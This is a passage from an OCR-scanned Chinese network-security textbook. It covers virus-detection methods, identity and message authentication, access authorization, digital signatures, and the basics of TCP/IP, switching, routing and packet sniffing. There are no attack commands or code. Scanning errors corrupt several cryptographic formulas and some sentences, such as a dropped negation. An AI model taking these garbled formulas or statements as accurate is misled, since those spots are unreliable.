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被 忽略 的 程度 ,而 Windows 操作 系统 的 多 任务 、 多 线程 环境 又 为 实时 反 病毒 技术 提供 了 良 
好 的 运行 环境 ,因此 ,实时 反 病 毒 技术 重新 得 到 重视 。 


2.4.4.2 病毒 检测 技术 


1. 比较 法 

比较 法 是 用 原始 备份 与 被 检测 的 引导 扇 区 或 被 检测 的 文件 进行 比较 。 比 较 时 可 以 靠 打 
印 的 代码 清单 (如 DEBUG 的 D 命令 输出 格式 ) 进 行 比较 ,或 用 程序 来 进行 比较 (如 DOS 的 
DISKCOMP,FC 或 PCTOOLS 等 其 他 软件 )。 这 种 比较 法 不 需要 专用 的 计算 机 病毒 检测 程 
序 , 只 要 用 常规 的 DOS 软件 和 PCTOOLS 等 工具 软件 就 可 以 进行 。 而 且 用 这 种 比较 法 还 
可 以 发 现 那 些 尚 不 能 被 现 有 的 查 计算 机 病毒 程序 发 现 的 计算 机 病毒 。 通 过 代码 分 析 , 可 以 
判定 某 个 程序 中 是 否 含有 已 知 的 计算 机 病毒 程序 ,对 于 新 型 计算 机 病毒 的 检测 就 只 有 人 靠 比 
较 法 和 分 析 法 ,有 时 必须 结合 这 两 者 一 同 工 作 。 

比较 法 的 好 处 是 简单 .方便 ,不 需 专 用 软件 。 其 缺点 是 无 法 确认 计算 机 病毒 的 种 类 名 
称 。 另 外 ,造成 被 检测 程序 与 原始 备份 之 间 差 别 的 原因 尚 需 进 一 步 验证 ,以 查 明 是 由 于 计算 
机 病毒 造成 的 ,还 是 由 于 系统 文件 被 偶然 原因 (如 突然 停电 程序 失控 、 恶 意 程 序 等 ) 破 坏 的 。 
另外 , 当 找 不 到 原始 备份 时 ,用 比较 法 就 不 能 马上 得 到 结论 。 

2. 加 总 比 对 法 

根据 每 个 程序 的 文件 名 称 ` 大 小 .时 间 .日 期 及 内 容 , 加 总 为 一 个 检查 码 , 再 将 检查 码 附 
于 程序 的 后 面 , 或 是 将 所 有 检查 码 放 在 同一 个 数据 库 中 ,再 利用 加 总 对 比 系统 ,追踪 并 记录 
每 个 程序 的 检查 码 是 否 被 更 改 , 以 判断 是 否 感染 了 计算 机 病毒 。 

这 种 技术 可 侦 测 到 各 种 计算 机 病毒 .但 最 大 的 缺点 就 是 误 判 率 高 , 且 无 法 确认 是 哪 种 计 
算 机 病毒 感染 的 。 另 外 ,无 法 检测 到 隐形 计算 机 病毒 。 

3. 搜索 法 

搜索 法 是 用 每 一 种 计算 机 病毒 体 含有 的 特定 字符 串 对 被 检测 的 对 象 进行 扫描 。 如 果 在 
被 检测 对 象 内 部 发 现 了 某 一 种 特定 字 节 串 , 就 表明 发 现 了 该 字 节 串 所 代表 的 计算 机 病毒 。 
国外 对 这 种 按 搜索 法 工作 的 计算 机 病毒 扫描 软件 称 作 Virus Scanner。 计 算 机 病毒 扫描 软 
件 由 两 部 分 组 成 : 一 部 分 是 计算 机 病毒 代码 库 , 含 有 经 过 特别 选 定 的 各 种 计算 机 病毒 的 代 
码 串 ; 另 一 部 分 是 利用 该 代码 库 进行 扫描 的 扫描 程序 。 目 前 ,常见 的 防 杀 计 算 机 病毒 软件 对 
已 知 计算 机 病毒 的 检测 大 多 采用 这 种 方法 。 计 算 机 病毒 扫描 程序 能 识别 的 计算 机 病毒 的 数 
目 完全 取决 于 计算 机 病毒 代码 库 内 所 含 计算 机 病毒 的 种 类 多 少 。 显 而 易 见 , 库 中 计算 机 病 
毒 代码 种 类 越 多 ,扫描 程序 能 识别 出 的 计算 机 病毒 就 越 多 。 

这 种 扫描 法 的 缺点 也 是 明显 的 : @ 当 被 扫描 的 文件 很 长 时 ,扫描 所 花 时 间 也 越 多 ; 
@ 新 的 计算 机 病毒 的 特征 串 未 加 入 计算 机 病毒 代码 库 时 , 老 版 本 的 扫 毒 程序 无 法 识别 出 新 
的 计算 机 病毒 ; @ 怀 有 恶意 的 计算 机 病毒 制造 者 得 到 代码 库 后 ,会 很 容易 地 改变 计算 机 病 
毒 体内 的 代码 ,生成 一 个 新 的 变种 ,使 扫描 程序 失去 检测 它 的 能 力 ; @ 容 易 产 生 误 报 ; OR 
易 识 别 多 维 变 形 计 算 机 病毒 。 

4. 分 析 法 

分 析 法 常 为 计算 机 病毒 技术 人 员 使 用 。 使 用 分 析 法 的 目的 在 于 以 下 几 点 : 

(1) 确认 被 观察 的 磁盘 引导 扇 区 和 程序 中 是 否 含有 计算 机 病毒 。 
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(2) 确认 计算 机 病毒 的 类 型 和 种 类 ,判定 其 是 否 是 一 种 新 的 计算 机 病毒 。 

(3) 搞 清 楚 计算 机 病毒 体 的 大 致 结构 ,提取 特征 识别 用 的 字 节 串 或 特征 字 , 用 于 增添 到 
计算 机 病毒 代码 库 供 计算 机 病毒 扫描 和 识别 程序 使 用 。 

(4) 详细 分 析 计 算 机 病毒 代码 ,为 制定 相应 的 防 杀 计算 机 病毒 措施 制定 方案 。 

使 用 分 析 法 要 求 具有 比较 全 面 的 有 关 计 算 机 、.DOS、Windows、 网 络 等 的 结构 和 功能 调 
用 以 及 关于 计算 机 病毒 方面 的 各 种 知识 ,这 是 与 其 他 检测 计算 机 病毒 方法 不 一 样 的 地 方 。 

除了 要 具有 相关 的 知识 外 ,还 需要 反 汇编 工具 、 二 进 制 文件 编辑 器 等 分 析 用 工具 程序 和 
专用 的 试验 计算 机 。 计 算 机 病毒 检测 的 分 析 法 是 防 杀 计算 机 病毒 工作 中 不 可 缺少 的 重要 技 
术 , 任 何 一 个 性 能 优良 的 防 杀 计算 机 病毒 系统 的 研制 和 开发 都 离 不 开 专 门人 员 对 各 种 计算 
机 病毒 的 详尽 而 认真 的 分 析 。 

分 析 的 步 又 分 为 静态 分 析 和 动态 分 析 两 种 。 静 态 分 析 是 指 利用 反 汇 编 工具 将 计算 机 病 
毒 代 码 打印 成 反 汇 编 指令 后 程序 清单 后 进行 分 析 。 分 析 人 员 具 有 的 素质 越 高 ,分 析 过 程 越 
快 理 解 越 深 。 动态 分 析 则 是 指 利用 DEBUG 等 调试 工具 在 内 存 带 毒 的 情况 下 ,对 计算 机 病 
毒 进行 动态 跟踪 ,观察 计算 机 病毒 的 具体 工作 过 程 ,以 进一步 在 静态 分 析 的 基础 上 理解 计算 
机 病毒 工作 的 原理 。 

5. 人 工 智 能 陷阱 技术 和 宏 病毒 陷阱 技术 

人 工 智能 陷阱 是 一 种 监测 计算 机 行为 的 常 驻 式 扫 描 技 术 。 它 将 所 有 计算 机 病毒 所 产生 
的 行为 归纳 起 来 ,一 旦 发 现 内 存 中 的 程序 有 任何 不 当 的 行为 ,系统 就 会 有 所 警觉 ,并 告知 使 
用 者 。 这 种 技术 的 优点 是 执行 速度 快 、 操 作 简便 , 且 可 以 侦 测 到 各 式 计 算 机 病毒 ;其 缺点 是 
程序 设计 难 , 且 不 容易 考虑 周全 。 

宏 病 毒 陷阱 技术 (MacroTrap) 是 结合 了 搜索 法 和 人 工 智能 陷阱 技术 , 依 行为 模式 来 侦 
测 已 知 及 未 知 的 宏 病 毒 。 其 中 ,配合 OLE2 技术 可 将 宏 与 文件 分 开 , 使 得 扫描 速度 变 得 飞 
快 ,而 且 更 可 有 效 地 将 宏 病 毒 彻底 清除 。 

6. 软件 仿真 扫描 法 

软件 仿真 扫描 技术 专门 用 来 对 付 多 态 变 形 计算 机 病毒 (polymorphic/ mutation virus), 
多 态 变 形 计算 机 病毒 在 每 次 传染 时 ,都 将 自身 以 不 同 的 随机 数 加 密 于 每 个 感染 的 文件 中 , 传 
统 搜 索 法 的 方式 根本 无 法 找到 这 种 计算 机 病毒 。 软 件 仿 真 技 术 则 是 成 功 地 仿真 CPU 执 
行 ,在 DOS 虚拟 机 (virtual machine) 下 伪 执 行 计算 机 病毒 程序 ,安全 并 确实 地 将 其 解密 ,再 
加 以 扫描 。 

7. 先知 扫描 法 

先知 扫描 技术 (Virus Instruction Code Emulation, VICE) 是 继 软 件 仿真 后 的 一 大 技术 
突破 。 先 知 扫描 技术 将 专业 人 员 用 来 判断 程序 是 否 存在 计算 机 病毒 代码 的 方法 ,分 析 归 纳 
成 专家 系统 和 知识 库 , 再 利用 软件 模拟 技术 (software emulation) 伪 执行 新 的 计算 机 病毒 ， 
超前 分 析出 新 计算 机 病毒 代码 ,防范 后 续 的 计算 机 病毒 。 


2.5 网 络 认 证 技术 


网 络 认 证 技术 是 网 络 安全 技术 的 重要 组 成 部 分 之 一 。 认 证 指 的 是 证 实 被 认证 对 象 是 否 
属实 和 是 否 是 有 效 的 一 个 过 程 。 其 基本 思想 是 通过 验证 被 认证 对 象 的 属性 来 达到 确认 被 认 
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证 对 象 是 否 真 实 有 效 之 目的 。 被 认证 对 象 的 属性 可 以 是 口令 .数字 签名 或 者 像 指 纹 .声音 
视网膜 这 样 的 生理 特征 。 认 证 常常 被 用 于 通信 双方 相互 确认 身份 ,以 保证 通信 的 安全 。 认 
证 可 以 采用 多 种 方法 进行 。 


2.5.1 身份 认证 


从 简单 意义 上 来 讲 , 身 份 认证 技术 就 是 对 通信 双方 进行 真实 身份 鉴别 ,也 是 对 网 络 信息 
资源 安全 进行 保护 的 第 一 个 防火 墙 ,目的 就 是 验证 和 辨别 网 络 信息 使 用 用 户 的 身份 是 否 具 
有 真实 性 和 合法 性 ,然后 给 予 授权 后 才能 访问 系统 ,不 能 通过 识别 的 用 户 就 会 阻止 其 访问 。 
由 此 可 知 ,身份 认证 在 安全 管理 中 是 重点 ,同时 也 是 最 基础 的 安全 服务 。 在 今后 的 发 展 中 ， 
身份 认证 技术 首先 需要 提高 其 安全 性 ,稳定 性 .实用 性 等 特点 ,在 认证 终端 需要 向 小 型 化 发 
展 。 身 份 认证 重点 是 向 以 下 几 个 方面 发 展 。 

l. 生物 认证 技术 

生物 特征 指 的 是 人 体 自 带 的 生理 特征 和 行为 特征 。 因 为 每 个 人 的 生物 特征 具有 唯一 
性 ,由 此 来 对 用 户 进 行 验证 。 生 物 特征 的 身份 认证 方法 有 可 靠 、. 稳 定 等 特点 ,也 是 最 安全 的 
身份 认证 方法 。 但 是 ,目前 还 没有 哪 种 生物 认证 方法 可 以 保证 100% 的 正确 率 。 因 此 ,怎么 
提高 识别 算法 和 硬件 水 平 是 保证 正确 率 的 一 个 重点 。 

2. 非 生物 认证 技术 

非 生物 认证 技术 一 般 采 用 口令 的 认证 方式 ,而 传统 的 认证 方式 就 是 使 用 口令 认证 。 口 
令 认 证 方法 具有 简单 .操作 方便 等 特点 。 认 证 者 首先 需要 拥有 用 户 使 用 账号 ,还 需要 保证 账 
号 在 用 户 数据 库 里 是 唯一 的 。 口 令 认 证 方式 主要 有 两 种 : 一 种 是 使 用 动态 口令 ,用 户 在 使 
用 网 络 安全 系统 的 时 候 , 所 需要 输入 的 口令 都 是 变化 的 ,不 是 固定 的 ,就 算 这 次 输入 口令 被 
他 人 获得 ,下 次 却 不 能 使 用 ; 另 一 种 是 静态 口令 ,使 用 者 经 过 系统 设置 和 保存 后 ,在 指定 时 间 
内 不 会 发 生变 化 ,一 个 口令 可 以 长 期 使 用 ,这 种 口令 相 比 于 动态 口令 操作 简单 ,但 没有 动态 
口令 安全 。 

3. 多 因素 认证 

结合 利用 各 类 因素 认证 技术 ,增强 身份 认证 的 安全 性 。 现 在 手机 短信 认证 和 Web 口令 
认证 早已 在 网 络 安全 中 得 到 利用 ,并 获得 了 不 错 的 口碑 。 


2.5.2 报 文 认 证 


报 文 认证 是 通过 网 络 中 交换 与 传输 的 数据 单元 进行 认证 的 一 种 方式 。 报 文 的 认证 方式 
有 传统 加 密 方式 认证 、 使 用 公开 密 钥 密码 的 报 文 认证 码 方式 、 使 用 单 向 散 列 函数 认证 。 

1. 使 用 传统 加 密 方式 认证 

传统 加 密 的 方式 是 以 整个 报 文 的 密 文 为 认证 码 。 设 A 为 发 送 方 ,B 为 接受 方 。A FB 
共享 保密 的 密 钥 Ks。A 的 标识 为 IDa , 报 文 为 M, 在 报 文中 增加 标识 IDa, ABA B 在 认证 A 
的 过 程 如 下 : 





AB, E(IDaA\\M.,Ks) 
B 在 收 到 报 文 后 用 Ks 解密 , 若 解密 所 得 的 发 送 方 标识 与 IDA 相同 , 则 B 认为 报 文 是 A 
发 来 的 。 
. 4] 。 


2. 使 用 公开 密 钥 密码 方式 认证 

通信 双方 共享 密 钥 K. A 利用 密 钥 KK 计算 认证 码 MAC ,将 报 文 M 和 MAC 一 块 发 给 
接收 方 , 即 : 

A—B; M\\MAC 

接收 方 收 到 报 文 M 后 ,用 相同 的 密 钥 K 重新 计算 得 出 新 的 MAC, 并 将 其 与 接收 到 的 
MAC 进行 比较 ,车 二 者 相等 , 则 认为 报 文正 确 真实 。 该 方法 中 , 报 文 是 以 明文 形式 发 送 的 ， 
所 以 该 方法 可 以 提供 认证 ,但 是 不 能 提供 保密 性 , 若 要 获得 保密 ,可 在 MAC 算法 之 后 对 报 
文 加密 : 

A—B; E(M\\MAC,K2), Hr MAC=C(M, Ki), 4 A MB 共享 Ki 时 ,可 以 提供 认 
证 ; 当 A MB 共享 K, 时 ,可 以 提供 保密 。 

3. 散 列 Hash 函数 方式 认证 

该 方法 是 将 任意 长 度 的 报 文 映 射 为 定 长 的 Hash 值得 公共 函数 ,以 Hash 值 作 为 认证 
码 。 如 下 形式 : 

A—>B:<M||E(Hash(M),K)> 

M 是 变 长 的 报 文 ,Hash(CM) 是 定 长 的 Hash 值 。 发 送 方 生 成 报 文 M 的 Hash (M) Jf: H 
传统 密码 对 其 加 密 ,将 加 密 后 的 结果 附 于 M 之 后 发 给 接收 方 。 接 收 方 B 由 M 重新 计算 
Hash(M) ,并 与 接收 到 的 比较 ,由 于 Hash(M) 受 密码 保护 ,所 以 B 通过 比较 Hash(M) 可 以 
认证 报 文 的 真实 性 和 完整 性 。 


2.5.3 访问 授权 


授权 指定 用 户 能 做 什么 。 通 常 认为 授权 是 建立 一 种 对 资源 的 访问 方式 ,如 访问 文件 和 
打印 机 ,授权 也 能 处 理 用 户 在 系统 或 者 网 络 上 的 特权 。 那 么 什么 是 网 络 安全 中 的 用 户 权限 
呢 ? 特权 或 用 户 权 限 的 权限 不 同 。 用 户 权 限 提供 授权 去 做 可 以 影响 整个 系统 的 事情 ,可 以 
创建 组 .把 用 户 分 配 到 组 .登录 系统 以 及 分 配 多 用 户 的 权限 。 其 他 的 用 户 权限 是 隐 含 的 , 默 
认 分 配给 组 ,这 里 的 组 是 由 系统 创建 的 组 而 不 是 管理 员 创建 ,无 法 移 除 这 些 权限 。 授 权 一 般 
基于 以 下 方式 。 

1. 基于 角色 的 授权 (RBAC) 

早期 的 计算 机 系统 存在 两 种 角色 : 用 户 和 管理 员 。 早 期 的 系统 针对 不 同类 型 的 用 户 ， 
基于 他 们 的 组 成 员 关系 来 定义 角色 和 授权 的 访问 。 授 予 管 理 员 ( 超 级 用 户 ,root 用 户 、 系 统 
管理 员 等 ) 特权 ,并 人 允许 他 们 比 普通 用 户 访问 更 多 的 计算 机 资源 。 例 如 ,管理 员 可 以 增加 用 
户 、 分 配 密码 ,访问 系统 文件 和 程序 ,并 可 以 重启 机 器 。 这 个 群体 后 来 扩展 到 包括 审计 员 的 
角色 , 即 用 户 可 以 读 取 系 统 信 息 和 在 其 他 系统 上 的 活动 信息 ,但 不 能 修改 系统 数据 或 执行 其 
他 管理 员 角 色 的 功能 。 

随 着 系统 的 发 展 ,用 户 角色 更 加 精细 化 ,用 户 可 以 通过 安全 许可 来 量化 。 例 如 ,允许 访 
问 特 定 的 数据 或 某 些 应 用 程序 。 其 他 区 别 则 基于 用 户 在 数据 库 或 者 其 他 应 用 系统 中 的 角色 
而 定 。 通 常情 况 下 ,角色 由 部 门 所 分 配 ,如 财务 .人 力 资源 .信息 技 术 和 销售 部 门 。 

2. 访问 控制 列表 (ACLs) 

信息 系统 可 能 也 可 以 使 用 ACL 来 确定 所 请 求 的 服务 或 资源 是 否 有 权限 。 访 问 服务 器 
上 的 文件 通常 由 保留 在 每 个 文件 的 信息 所 控制 。 同 样 .网络 设备 上 不 同类 型 的 通信 也 可 以 
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通过 ACL 来 控制 。 

3. 基于 规则 的 授权 

基于 规则 的 授权 需要 开发 一 套 规则 来 规定 特定 的 用 户 在 系统 上 能 做 什么 。 这 些 规 则 可 
能 会 提供 如 下 信息 ,例如 “用 户 Alice 能 够 访问 资源 Z 但 不 能 访问 资源 D”"。 更 复杂 的 规则 
是 指定 组 合 , 例 如 “用 户 Bob 只 有 坐 在 数据 中 心 的 控制 台 时 才能 阅读 文件 P”。 在 小 的 系统 
中 ,基于 规则 的 授权 可 能 并 不 难 维护 ;但 是 ,在 大 的 系统 和 网 络 中 ,基于 规则 的 授权 极其 烦琐 
和 难以 管理 。 


2.5.4 数字 签名 


数字 签名 是 利用 数字 技术 实现 在 网 络 传送 文件 时 ,附加 个 人 标记 ,完成 系统 上 手书 签名 
盖 章 的 作用 ,以 表示 确认 、 负 责 和 经 手 等 。 数 字 签名 (又 称 数 字 签 字 ) 是 实现 认证 的 重要 工 
具 , 在 电子 商务 系统 中 是 不 可 缺少 的 。 保 证 传送 文件 的 机 密 性 应 使 用 加 密 技 术 ,保证 传送 文 
件 的 完整 性 应 使 用 信息 摘要 技术 ,而 保证 认证 性 和 不 可 否认 性 应 使 用 数字 签名 技术 。 

数字 签名 技术 是 公开 密 钥 加 密 技术 和 报 文 分 解 函 数 相 结合 的 产物 。 与 加 密 不 同 ,数字 
签名 的 目的 是 为 了 保证 信息 的 完整 性 和 真实 性 。 数 字 签 名 必须 保证 做 到 以 下 3 点 : 

(1) 接收 者 能 够 核实 发 送 者 对 消息 的 签名 。 

(2) 发 送 者 事后 不 能 抵赖 对 消息 的 签名 。 

(3) 接收 者 不 能 伪造 对 消息 的 签名 。 

数字 签名 可 以 解决 接收 方 伪造 发送 者 或 接收 者 否认 、 第 三 方 冒充 发 送 或 接收 文件 、 接 
收 方 算 改 等 问题 。 数 字符 名 可 以 分 为 RSA 签名 体制 .EIGamal 签名 体制 、 盲 签名 、 双 联 签名 
和 无 可 争辩 签名 等 。 
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423m 


网 络 分 析 实 验 


3.1 网 络 分 析 原 理 


3.1.1 TCP/IP 原理 


TCP/IP 是 一 个 4 层 协议 系统 ,TCP/IP 协议 族 是 一 组 不 同 的 协议 组 合 在 一 起 构成 的 协 


DUK. TCP/IP 原理 可 以 概括 为 以 下 两 点 。 
CD 数据 发 送 时 自 上 而 下 , 层 层 加 码 ; 数 据 接 收 时 自 下 而 上 , 层 层 解 码 。 


如 图 3.1. 1 所 示 , 当 应 用 程序 用 TCP 传送 数据 时 ,数据 被 送 入 协议 栈 中 ,然后 逐 层 通 
过 ,直到 被 当 作 一 串 比特 流 送 入 网 络 。 每 一 层 对 接收 到 的 数据 都 要 增加 一 些 首部 信息 (有 时 
还 要 增加 尾部 信息 )。TCP 传 给 IP 的 数据 单元 称 为 TCP 报 文 段 。IP 传 给 网 络 接口 层 的 数 


据 单元 称 为 IP 数据 报 。 通 过 以 太 网 传输 的 比特 流 称 为 帧 。 
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(2) 逻辑 通信 在 同 层 完 成 。 


数据 沿 垂直 方向 传递 ( 即 数据 在 各 层 间 依次 传递 ) 是 当今 普遍 认可 的 数据 处 理 的 功能 流 
程 。 每 一 层 都 有 与 其 相 邻 层 的 接口 。 为 了 通信 ,系统 必须 在 各 层 之 间 传 递 数据 、 指 令 、 地 址 
等 信息 ,通信 的 逻辑 流程 与 真正 的 数据 流 不 同 ,虽然 通信 流程 牌 直 通过 各 层 , 但 每 一 层 都 在 
逻辑 上 能 够 直接 与 远程 计算 机 系统 的 相应 协议 层 直接 通信 。 如 图 3. 1. 2 所 示 , 通 信和 实际 上 





是 按 垂 直方 向 进行 的 ,但 在 逻辑 上 通信 是 在 同 层 进行 的 。 
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图 312 逻辑 通信 结构 


3.1.2 交换 技术 


所 谓 交换 ,就 是 将 分 组 (或 帧 ) 从 一 个 端口 转移 到 另 一 端口 的 动作 。 交 换 机 在 操作 过 程 
当中 会 不 断 地 收集 资料 去 建立 它 本 身 的 一 个 地 址 表 ,MAC 地 址 表 显 示 了 主机 的 MAC 地 址 
与 以 太 网 交换 机 端口 的 映射 关系 ,指出 数据 帧 去 往 的 目标 主机 。 

当 以 太 网 交换 机 收 到 一 个 数据 帧 时 ,将 数据 帧 的 目的 MAC 地 址 与 MAC 地 址 表 进 行 
查找 匹配 。 如 果 在 MAC 地 址 表 中 没有 相应 的 匹配 项 , 则 向 除 接收 端口 外 的 所 有 端口 广播 
该 数据 帧 。 当 MAC 地 址 表 中 有 匹配 项 时 ,该 匹配 项 指定 的 交换 机 端口 与 接收 端口 相同 则 
表明 该 数据 帧 的 目的 主机 和 源 主机 在 同一 广播 域 中 ,不 通过 交换 机 可 以 完成 通信 ,交换 机 将 
丢弃 该 数据 帧 ;否则 ,交换 机 把 该 数据 帧 转发 到 相应 的 端口 。 

交换 机 检查 收 到 数据 帧 的 源 MAC 地 址 ,并 查找 MAC 地 址 表 中 与 之 相 匹配 的 项 。 如 
果 没 有 ,交换 机 将 记录 该 MAC 地 址 和 接收 该 数据 帧 的 端口 ,并 激活 一 个 定时 器 ,这 个 过 程 
被 称 为 地 址 学 习 ; 如 果 接 收 的 数据 帧 的 源 MAC 地 址 在 地 址 表 中 有 匹配 项 ,交换 机 将 复位 该 
地 址 的 定时 器 。 如 果 交 换 机 不 能 够 正确 联系 MAC 地 址 , 则 有 可 能 造成 数据 包 丢 失 以 及 泛 
洪 现象 的 发 生 ,影响 交换 机 的 转发 性 能 。 

局 域 网 交换 技术 是 作为 对 共享 式 局 域 网 提供 有 效 的 网 段 划 分 的 解决 方案 ,可 以 使 用 户 
尽 可 能 地 分 享 到 最 大 带宽 。 交 换 技 术 在 OSI 7 层 网 络 模型 中 的 第 二 层 , 即 数据 链 路 层 进 行 
操作 ,交换 机 对 数据 包 的 转发 建立 在 MAC 地 址 基础 上 ,对 于 IP 网 络 协议 来 说 , 它 是 透明 
的 , 即 交 换 机 在 转发 数据 包 时 ,无 须知 道 信 源 机 和 目标 机 的 IP 地 址 ,只 需 知 其 物理 地 址 
即 可 。 


3.1.3 路 由 技术 


路 由 是 指 通过 相互 连接 的 网 络 把 信息 从 源 地 点 移动 到 目标 地 点 的 过 程 。 在 路 由 过 程 
中 ,信息 至 少 会 经 过 一 个 或 多 个 中 间 节 点 。 路 由 和 交换 所 实现 的 功能 类 似 。 但 二 者 的 区 别 
是 明显 的 ,交换 发 生 在 OSI 参考 模型 的 第 二 层 ( 即 数据 链 路 层 ) ,而 路 由 发 生 在 第 三 层 ( 即 网 
络 层 )。 这 一 区 别 决定 了 路 由 和 交换 在 传输 信息 的 过 程 中 需要 使 用 不 同 的 控制 信息 。 
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当 全 子 网 中 的 一 台 主 机 发 送 IP 分 组 给 同一 子 网 的 另 一 台 主 机 时 , 它 将 直接 把 IP 分 组 
送 到 网 络 上 ,对方 就 能 收 到 。 当 发 送 给 不 同 子 网 上 的 主机 时 , 它 要 选择 一 个 能 到 达 目 的 子 网 
上 的 路 由 器 ,把 IP 分 组 传递 给 该 路 由 器 ,由 路 由 器 负责 把 IP 分 组 送 到 目的 地 。 如 果 没 有 这 
样 的 路 由 器 ,主机 就 把 IP 分 组 送 给 一 个 被 称 为 默认 网 关 的 路 由 器 。 黑 认 网 关 是 每 台 主 机 上 
的 一 个 配置 参数 , 它 是 同一 个 网 络 上 的 某 个 路 由 器 端口 的 TP 地 址 。 

同 主机 一 样 , 路 由 器 也 要 判定 端口 连接 的 是 否 为 目的 子 网 ,如 果 是 ,就 直接 把 分 组 通过 
端口 送 到 网 络 上 ;和 否则 ,也 要 选择 下 一 个 路 由 器 来 传送 分 组 。 路 由 器 也 有 它 的 默认 网 关 , 用 
来 传送 IP 分 组 ,通过 逐 级 传送 ,IP 分 组 最 终 将 送 到 目的 地 ,和 否则 IP 分 组 被 网 络 丢弃 。 

路 由 器 不 仅 负责 IP. 分 组 转发 ,还 需 与 其 他 路 由 器 联络 ,确定 网 络 的 路 由 选择 和 维护 路 
由 表 。 路 由 包含 两 个 基本 的 动作 : 选择 最 佳 路 径 和 通过 网 络 传输 信息 。 在 路 由 过 程 中 ,后 
者 也 称 为 (数据 ) 交 换 。 交 换 相对 来 说 比较 简单 ,而 选择 路 径 却 很 复杂 。 

路 径 选 择 是 判定 到 达 目 的 地 的 最 佳 路 径 , 由 路 由 选择 算法 来 实现 。 由 于 涉及 不 同 的 路 
由 选择 协议 和 路 由 选择 算法 ,要 相对 复杂 一 些 。 为 了 判定 最 佳 路 径 , 路 由 选择 算法 必须 启动 
并 维护 包含 路 由 信息 的 路 由 表 , 其 中 路 由 信息 依赖 于 所 用 的 路 由 选择 算法 。 

metric 是 路 由 算法 用 以 确定 到 达 目 的 地 的 最 佳 路 径 的 计量 标准 。 路 由 算法 根据 许多 信 
息 来 填充 路 由 表 。 路 由 器 查看 数据 包 的 目的 协议 地 址 后 ,确定 是 否 知道 如 何 转发 该 包 , 如 果 
路 由 器 不 知道 如 何 转发 ,通常 就 将 之 丢弃 :如果 路 由 器 知道 如 何 转发 ,就 把 目的 物理 地 址 变 
成 下 一 跳 的 物理 地 址 并 向 之 发 送 。 下 一 跳 可 能 就 是 最 终 的 目的 主机 ,如 果 不 是 ,通常 为 男 一 
个 路 由 器 , 它 将 执行 同样 的 步 又 。 


3.1.4 网 络 嗅 探 技术 
3.1.4.1. 嗅 探 技术 简介 


嗅 探 (sniff) 技 术 是 一 种 重要 的 网 络 安全 攻防 技术 。 对 黑客 来 说 ,通过 嗅 探 技术 能 以 非 
常 隐藏 的 方式 搜 取 网 络 中 的 大 量 敏感 信息 ,与 主动 扫描 相 比 , 嗅 探 行为 更 难 被 察觉 ,也 更 容 
易 操 作 。 对 安全 管理 人 员 来 说 ,借助 嗅 探 技术 ,可 以 对 网 络 活 动 进行 实时 监控 , 发现 各 种 网 
络 攻击 行为 。 嗅 探 技术 最 初 是 作为 网 络 管理 员 检 测 网 络 通信 的 必 备 技术 , 嗅 探 器 (sniffer) 
既 可 以 是 软件 ,又 可 以 是 一 个 硬件 设备 。 软 件 嗅 探 器 应 用 方便 ,针对 不 同 的 操作 系统 平台 都 
有 多 种 不 同 的 软件 嗅 探 器 ;硬件 嗅 探 器 通常 称 为 协议 分 析 器 ,其 价格 一 般 都 很 高 。 

在 局 域 网 中 ,由 于 以 太 网 的 共享 式 特性 决定 了 嗅 探 能 够 成 功 。 因 为 以 太 网 是 基于 广播 
方式 传送 数据 的 ,所 有 的 物理 信号 都 会 被 传送 到 每 一 个 主机 节点 ,此 外 网 卡 可 以 被 设置 成 混 
杂 接 收 模式 。 在 这 种 模式 下 ,无 论 监听 到 的 数据 帧 目的 地 址 如 何 , 网 卡 都 能 予以 接收 。 而 
TCP/IP 协议 栈 中 的 应 用 协议 大 多 是 以 明文 在 网 络 上 传输 的 ,这 些 明文 数据 中 ,往往 包含 一 
些 敏感 信息 (如 密码 ,账号 等 ) ,使 用 嗅 探 器 可 以 监听 到 所 有 局 域 网 内 的 数据 通信 ,并 得 到 这 
些 敏 感 信 息 。 

嗅 探 器 的 隐藏 性 好 , 它 只 是 被 动 接收 数据 ,不 向 外 发 送 数据 ,所 以 在 传输 数据 过 程 中 , 根 
本 无 法 觉察 。 嗅 探 器 的 局 限 性 是 只 能 在 局 域 网 的 冲突 域 中 进行 ,或 者 是 在 点 到 点 连接 的 中 
间 节 点 上 进行 监听 。 
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3.1.4.2. 网 络 嗅 探 器 


网 络 嗅 探 器 在 当前 网 络 技术 中 使 用 得 非常 广泛 。 网 络 嗅 探 器 既 可 以 作为 网 络 故障 的 诊 
断 工具 ,也 可 以 作为 监听 工具 。 传 统 的 网 络 嗅 探 技 术 是 被 动 地 监听 网 络 通信 、 用 户 名 和 口 
令 。 而 新 的 网 络 嗅 探 技 术 开 始 主动 地 控制 通信 数据 。 大 多 数 嗅 探 器 至 少 能 够 分 析 标准 以 太 
网 .TCP/IP、IPX 和 DECNET 等 协议 。 

根据 功能 不 同 , 嗅 探 器 可 以 分 为 通用 网 络 嗅 探 器 和 专用 嗅 探 器 。 前 者 支持 多 种 协议 ,如 
tcpdump,Snifferit 等 ;后 者 一 般 是 针对 特定 软件 或 提供 特定 功能 ,如 专门 针对 MSN 等 即时 
通信 软件 的 嗅 探 器 .专门 嗅 探 邮件 密码 的 嗅 探 器 等 。 


3.1.4.3. 嗅 探 技术 分 类 


根据 工作 环境 和 工作 原理 不 同 , 嗅 探 技术 又 可 以 分 为 本 机 嗅 探 .广播 网 嗅 探 和 交换 机 嗅 
探 等 类 型 。 

1. 本 机 嗅 探 

本 机 嗅 探 是 指 在 某 台 计算 机 内 , 嗅 探 程 序 通 过 某 种 方式 获取 发 送 给 其 他 进程 的 数据 包 
的 过 程 。 例 如 , 当 邮 件 客户 端 在 收发 邮件 时 , 嗅 探 程 序 可 以 窃听 到 所 有 的 交互 过 程 和 其 中 传 
递 的 数据 。 

2. 广播 网 嗅 探 

广播 网 基于 集线器 (hub) 的 局 域 网 络 ,其 工作 原理 是 基于 总 线 方式 的 ,所 有 的 数据 包 在 
该 网 络 中 都 会 被 广播 发 送 ( 即 发 送 给 所 有 端口 )。 在 广播 网 中 ,每 一 个 网 络 数据 包 都 被 发 送 
到 所 有 的 端口 ,然后 由 各 端口 所 连接 的 网 卡 来 判断 是 否 需要 接收 ,所 有 目的 地 址 与 网 卡 实际 
地 址 不 符 的 数据 包 将 被 网 卡 驱动 自动 丢弃 ,这 确保 了 广播 网 中 每 台 主 机 只 接受 到 以 自己 为 
目标 的 数据 包 。 

广播 网 嗅 探 利用 了 广播 网 “共享 ”的 通信 方式 。 在 广播 网 中 所 有 的 网 卡 都 会 收 到 所 有 的 
